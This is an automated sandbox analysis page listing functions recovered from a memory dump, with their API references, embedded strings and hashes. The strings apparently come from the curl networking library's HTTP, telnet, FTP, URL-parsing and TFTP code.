Lying server, not serving HTTP/2, xrefs: 00007FF7F8D2CF0D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isspace
String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$,$Content-Length:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2$chunked$deflate$gzip$identity$x-gzip
API String ID: 3785662208-25230839
Opcode ID: 91a0a15b42e59837f7cda72a9521f443044f5965f9416a7cba8fa7c7546208b5
Instruction ID: 41515b50c324e735face36927a3a542abbdec06849a679e3b7ae5472546c2327
Opcode Fuzzy Hash: 91a0a15b42e59837f7cda72a9521f443044f5965f9416a7cba8fa7c7546208b5
Instruction Fuzzy Hash: 43C19132A0868A86EB64AB24D5407B9F790FF09780F944135C76D832D1DF3CE459E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2D2CF Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 259COMMON

Download Yara Rule

Strings

HTTP/1.0 connection set to keep alive!, xrefs: 00007FF7F8D2D390
Content-Length:, xrefs: 00007FF7F8D2D11C
HTTP/1.1 proxy connection set close!, xrefs: 00007FF7F8D2D34F
HTTP/1.0 proxy connection set to keep alive!, xrefs: 00007FF7F8D2D300
Proxy-Connection:, xrefs: 00007FF7F8D2D2E0, 00007FF7F8D2D32D
HTTP 1.0, assume close after body, xrefs: 00007FF7F8D2D04C
HTTP/%1d.%1d%c%3d, xrefs: 00007FF7F8D2CE92
close, xrefs: 00007FF7F8D2D326, 00007FF7F8D2D3AB
Connection:, xrefs: 00007FF7F8D2D370, 00007FF7F8D2D3B2
HTTP/2 %d, xrefs: 00007FF7F8D2CEB5
Lying server, not serving HTTP/2, xrefs: 00007FF7F8D2CF0D
keep-alive, xrefs: 00007FF7F8D2D2D6, 00007FF7F8D2D369

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$isspace
String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Connection:$Content-Length:$HTTP 1.0, assume close after body$HTTP/1.0 connection set to keep alive!$HTTP/1.0 proxy connection set to keep alive!$HTTP/1.1 proxy connection set close!$Lying server, not serving HTTP/2$Proxy-Connection:$close$keep-alive
API String ID: 556700956-3121621470
Opcode ID: 82ec5805037d26ee7592c6b41ce6d7fd1c23136c292204410feed31d9a497e4e
Instruction ID: f460fc690279be115a13ee46090cb54f65195050b7359f58657b008c3a2d7711
Opcode Fuzzy Hash: 82ec5805037d26ee7592c6b41ce6d7fd1c23136c292204410feed31d9a497e4e
Instruction Fuzzy Hash: 9AD19331A08B8A96EB64EB24D5406B9F7A0FF09750F844132C66D832D5DF3CE459E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D39480 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 168stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D39513
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D395B3
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3960F

Part of subcall function 00007FF7F8D0E620: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D02C4C), ref: 00007FF7F8D0E652

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D396E7

Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055

Strings

NEW_ENV, xrefs: 00007FF7F8D39628
%hu%*[xX]%hu, xrefs: 00007FF7F8D396B0
USER,%s, xrefs: 00007FF7F8D39503
%127[^= ]%*[ =]%255s, xrefs: 00007FF7F8D39578
Unknown telnet option %s, xrefs: 00007FF7F8D39711
XDISPLOC, xrefs: 00007FF7F8D395E9
TTYPE, xrefs: 00007FF7F8D3958D
BINARY, xrefs: 00007FF7F8D396CE
Syntax error in telnet option: %s, xrefs: 00007FF7F8D3972A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strncpy$__stdio_common_vsscanf__swprintf_latoifree
String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
API String ID: 3073542286-748038847
Opcode ID: 8acb15c5c82fbc97157259be6f5b3fd1976768a32f4e92d5c1cea61d6e55a0a2
Instruction ID: e73d3163d147d351fc5bbf933f70604de96fc503e4a1e6185f96ef309ca4063b
Opcode Fuzzy Hash: 8acb15c5c82fbc97157259be6f5b3fd1976768a32f4e92d5c1cea61d6e55a0a2
Instruction Fuzzy Hash: FD817D22A18A86A1FB14EF21D9446E9E360FF4D788FC40032DA6D472D5DF3CE519E3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0BE6C Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 138stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D0BEB2
strchr.LIBVCRUNTIME ref: 00007FF7F8D0BEC2
__swprintf_l.LIBCMT ref: 00007FF7F8D0BF41
__swprintf_l.LIBCMT ref: 00007FF7F8D0BF74
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0BF7E
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0BF8F
_getch.API-MS-WIN-CRT-CONIO-L1-1-0 ref: 00007FF7F8D0BF9B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0BFD2
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0BFE2
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C01F

Strings

Enter %s password for user '%s':, xrefs: 00007FF7F8D0BF21
Enter %s password for user '%s' on URL #%I64u:, xrefs: 00007FF7F8D0BF54
;, xrefs: 00007FF7F8D0BED6

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __acrt_iob_func__swprintf_lfputsstrchr$_getchrealloc
String ID: ;$Enter %s password for user '%s' on URL #%I64u:$Enter %s password for user '%s':
API String ID: 1528618394-757488312
Opcode ID: 931e3b161f37cd3dfbb5602e6aba708a8714cc9cb027de7268539cd7d6ed9be6
Instruction ID: 70928682973f9a96343555dcef1f35ca8d64639fee1ce7af7bbac6d5e1a4e0df
Opcode Fuzzy Hash: 931e3b161f37cd3dfbb5602e6aba708a8714cc9cb027de7268539cd7d6ed9be6
Instruction Fuzzy Hash: 9051B32260D68255EB21AB11E4443FAE7A0AF4C784F880135DEBE073D9DF3CD559D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1FFB0 Relevance: 22.7, APIs: 18, Instructions: 181COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1FFE1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1FFFA

Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9,?,?,?,00007FF7F8D19C81), ref: 00007FF7F8D23E95
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9), ref: 00007FF7F8D23EB0
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9), ref: 00007FF7F8D23ECB
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23EE6
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23F01
Part of subcall function 00007FF7F8D23E74: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23F1C

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20043
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20063
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D200C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D200E1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20101
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20121
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20195
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D201B5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20257
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20277
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20297
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D202B7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D202D7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D202F7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20317
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D20353

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f25421f54573a157d687ac2f20d382b369c2b34ce666d32837747bbf85741083
Instruction ID: 4739d728f9e728ecfd0fe7247ead0301d1d7a842e20f7c67fd2ab62d96fbf242
Opcode Fuzzy Hash: f25421f54573a157d687ac2f20d382b369c2b34ce666d32837747bbf85741083
Instruction Fuzzy Hash: 3CA16F36609A86D6D759AF31F9602A9F364FB9CB80F884135CBAE43351CF3CE0689754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D35940 Relevance: 21.3, APIs: 3, Strings: 11, Instructions: 287stringCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3599D
strchr.LIBVCRUNTIME ref: 00007FF7F8D359CC

Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D35D93

Strings

%c%c%c%u%c, xrefs: 00007FF7F8D35A06
%d.%d.%d.%d, xrefs: 00007FF7F8D35BC7
Skip %d.%d.%d.%d for data connection, re-use %s instead, xrefs: 00007FF7F8D35B59
Illegal port number in EPSV reply, xrefs: 00007FF7F8D35A46
Connecting to %s (%s) port %d, xrefs: 00007FF7F8D35D5E
Weirdly formatted EPSV reply, xrefs: 00007FF7F8D35ABD
%d,%d,%d,%d,%d,%d, xrefs: 00007FF7F8D35B1D
Bad PASV/EPSV response: %03d, xrefs: 00007FF7F8D35DFE
Couldn't interpret the 227-response, xrefs: 00007FF7F8D35DE5
Can't resolve new host %s:%hu, xrefs: 00007FF7F8D35CD3
Can't resolve proxy host %s:%hu, xrefs: 00007FF7F8D35C71

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$__stdio_common_vsscanfstrchr
String ID: %c%c%c%u%c$%d,%d,%d,%d,%d,%d$%d.%d.%d.%d$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %d.%d.%d.%d for data connection, re-use %s instead$Weirdly formatted EPSV reply
API String ID: 551833581-430170857
Opcode ID: e36794e94d7dfbf1cdcfab1069ef77bf2f41708d74add39ea8d1ef33a03e04b1
Instruction ID: 4765f3d353c7b38f14ac886ed045c27f54a11e2c357449ace51d437474cbf927
Opcode Fuzzy Hash: e36794e94d7dfbf1cdcfab1069ef77bf2f41708d74add39ea8d1ef33a03e04b1
Instruction Fuzzy Hash: B3D19425A0CA8692EB18EB21E9402B9E760FF4D784F840032DA6D077D5DF3CE569F794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D30F90 Relevance: 21.2, APIs: 10, Strings: 4, Instructions: 174stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D30FD4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D31015
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D31037
strchr.LIBVCRUNTIME ref: 00007FF7F8D31049
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D31069
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D31083
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D310A6
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D311D3

Strings

/../, xrefs: 00007FF7F8D310EA
../, xrefs: 00007FF7F8D31079
/./, xrefs: 00007FF7F8D3109C
/.., xrefs: 00007FF7F8D3111A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: freestrncmp$mallocstrchr
String ID: ../$/..$/../$/./
API String ID: 52199485-456519384
Opcode ID: 81cf380c42f6a9c7741149d5f89adb35764e81b9d653370f2f332759046074bd
Instruction ID: 2d5cd31299502f45f003308b4b786b90d3ba5661271ae79230d3b5f7a203f84d
Opcode Fuzzy Hash: 81cf380c42f6a9c7741149d5f89adb35764e81b9d653370f2f332759046074bd
Instruction Fuzzy Hash: ED717011A0D58744FF126B21E9103B8DB956F29B90FC84171DABD463D1DE2CA44AF3B9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1F48C Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 166stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055

strchr.LIBVCRUNTIME ref: 00007FF7F8D1F4F0
inet_pton.WS2_32 ref: 00007FF7F8D1F51F
strchr.LIBVCRUNTIME ref: 00007FF7F8D1F550
__swprintf_l.LIBCMT ref: 00007FF7F8D1F5E9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F8D20722), ref: 00007FF7F8D1F6A0
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7F8D20722), ref: 00007FF7F8D1F715

Strings

Port number out of range, xrefs: 00007FF7F8D1F75F
%s://%s%s%s:%hu%s%s%s, xrefs: 00007FF7F8D1F666
;type=%c, xrefs: 00007FF7F8D1F5D8
Port number ended with '%c', xrefs: 00007FF7F8D1F734
[%*45[0123456789abcdefABCDEF:.]%c, xrefs: 00007FF7F8D1F4BB
IPv6 numerical address used in URL without brackets, xrefs: 00007FF7F8D1F52B

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$__stdio_common_vsscanf__swprintf_lfreeinet_ptonstrtol
String ID: %s://%s%s%s:%hu%s%s%s$;type=%c$IPv6 numerical address used in URL without brackets$Port number ended with '%c'$Port number out of range$[%*45[0123456789abcdefABCDEF:.]%c
API String ID: 1531573046-2409472992
Opcode ID: c7bcae011e34022283afc6b280f93ec16f7c4577c7b3c33e4fbae35c9be6089f
Instruction ID: a3cca70aec0fa291188aed6d07219d39ce108ab65187765f3225cabda7e2d382
Opcode Fuzzy Hash: c7bcae011e34022283afc6b280f93ec16f7c4577c7b3c33e4fbae35c9be6089f
Instruction Fuzzy Hash: 7381912260CBC185FB20EF35E8502E9FBA0EF49790F944036DAAD477A5DE2CD548D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1F9FC Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148stringCOMMON

Download Yara Rule

APIs

isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,?,?,00000000,?,?,00007FF7F8D2078E), ref: 00007FF7F8D1FA7F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,?,?,00000000,?,?,00007FF7F8D2078E), ref: 00007FF7F8D1FAB0
strchr.LIBVCRUNTIME ref: 00007FF7F8D1FB24
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D1FB4F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?,00000000,?,?,00007FF7F8D2078E), ref: 00007FF7F8D1FBBA

Strings

%25, xrefs: 00007FF7F8D1FAA6
Invalid IPv6 address format, xrefs: 00007FF7F8D1FB0D
Please URL encode %% as %%25, see RFC 6874., xrefs: 00007FF7F8D1FABA
No valid port number in connect to host string (%s), xrefs: 00007FF7F8D1FB76

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: freeisxdigitstrchrstrncmpstrtol
String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
API String ID: 4079200914-2404041592
Opcode ID: 469f0991adbe2d5c7b120f583ab6e8e2235976a9a2f4a52b611c4f65ea0b00d0
Instruction ID: c7527cc2ae65b40bf95ee8a41bbdd2a0e03d860b0c9719345c0d766006d79f46
Opcode Fuzzy Hash: 469f0991adbe2d5c7b120f583ab6e8e2235976a9a2f4a52b611c4f65ea0b00d0
Instruction Fuzzy Hash: 12518451A0DB8244FB11AB32E860378EB90AF5DBA4F8C4031C96D466D5DE7CE44DE3A9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1EC2C Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1ED65
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1ED7D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1ED95
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1EDC5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1EDF7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1EE41
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1EE7F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1EF2C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1EFA4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1EFB9

Part of subcall function 00007FF7F8D1EB1C: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1EB95
Part of subcall function 00007FF7F8D1EB1C: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1EBB9

Strings

NO_PROXY, xrefs: 00007FF7F8D1ECF9
no_proxy, xrefs: 00007FF7F8D1ECE5
memory shortage, xrefs: 00007FF7F8D1ECA2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$strncpy
String ID: NO_PROXY$memory shortage$no_proxy
API String ID: 526250031-2769599289
Opcode ID: fedc0dd161cbf5462213db2f81213b3f33f7862e5c583ceb5e97a95514a1b97f
Instruction ID: e0712c242fd56a3f89030e855fad6fc4109ad5ea9c8c6dac1310e56a592ddf84
Opcode Fuzzy Hash: fedc0dd161cbf5462213db2f81213b3f33f7862e5c583ceb5e97a95514a1b97f
Instruction Fuzzy Hash: 79A14515B0DEC195FB59AB32B910279D794BF5DB94F880034DE6E07391DF3CA428A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2D513 Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 247COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2D520

Strings

Content-Length:, xrefs: 00007FF7F8D2D11C
identity, xrefs: 00007FF7F8D2D539
x-gzip, xrefs: 00007FF7F8D2D59D
deflate, xrefs: 00007FF7F8D2D55B
HTTP 1.0, assume close after body, xrefs: 00007FF7F8D2D04C
gzip, xrefs: 00007FF7F8D2D583
HTTP/%1d.%1d%c%3d, xrefs: 00007FF7F8D2CE92
HTTP/2 %d, xrefs: 00007FF7F8D2CEB5
Lying server, not serving HTTP/2, xrefs: 00007FF7F8D2CF0D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isspace
String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Content-Length:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2$deflate$gzip$identity$x-gzip
API String ID: 3785662208-3444300602
Opcode ID: a3de04446af61df85552f8435f7f04c19453461ced4174aa80fdadbf7d5d3986
Instruction ID: dd30c383ee341e20ad3a61f17fb11e2b16bded20c962404fb36dc7108e6857a8
Opcode Fuzzy Hash: a3de04446af61df85552f8435f7f04c19453461ced4174aa80fdadbf7d5d3986
Instruction Fuzzy Hash: B7C19032A0868A86FB64AB24D5406B9F7A0FF09790F944135C76D832D1DF3CE459E7B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D31EA0 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 201networkCOMMON

Download Yara Rule

APIs

sendto.WS2_32 ref: 00007FF7F8D31FD1
sendto.WS2_32 ref: 00007FF7F8D3208C
WSAGetLastError.WS2_32(?,?,?,?,?,00007FF7F8D3165D), ref: 00007FF7F8D32096
_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,00007FF7F8D3165D), ref: 00007FF7F8D320C9
sendto.WS2_32 ref: 00007FF7F8D321CD
WSAGetLastError.WS2_32(?,?,?,?,?,00007FF7F8D3165D), ref: 00007FF7F8D321D7

Strings

tftp_tx: giving up waiting for block %d ack, xrefs: 00007FF7F8D3204C
Received ACK for block %d, expecting %d, xrefs: 00007FF7F8D32026
Timeout waiting for block %d ACK. Retries = %d, xrefs: 00007FF7F8D31EF8
tftp_tx: internal error, event: %i, xrefs: 00007FF7F8D31EE3

Memory Dump Source

